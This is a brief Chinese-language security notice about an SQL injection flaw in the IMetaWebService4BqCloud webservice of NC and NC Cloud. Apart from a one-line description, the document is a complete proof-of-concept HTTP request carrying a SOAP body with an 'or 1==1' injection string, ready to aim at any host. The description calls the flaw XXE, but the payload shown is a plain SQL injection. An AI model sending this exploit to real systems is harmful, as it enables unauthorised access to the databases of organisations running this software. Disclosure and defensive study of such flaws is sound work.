漏洞描述
<span style="color: rgb(0, 0, 0);">NC及NC Cloud系统可利用webservice IMetaWebService4BqCloud XXE漏洞实现SQL注入。</span>
关于NC及NC Cloud系统的IMetaWebService4BqCloud XXE的SQL注入漏洞的安全通告
PoC代码
POST /uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud HTTP/1.1
Host:
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 310
Content-Type: text/xml
Soapaction: urn:loadFields
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imet="http://meta.ae.pubitf.uap/IMetaWebService4BqCloud"><soapenv:Header/><soapenv:Body><imet:loadFields><!--Optional:--><imet:string>SmartModel^2'+or+1%3d%3d1+--</imet:string></imet:loadFields></soapenv:Body></soapenv:Envelope>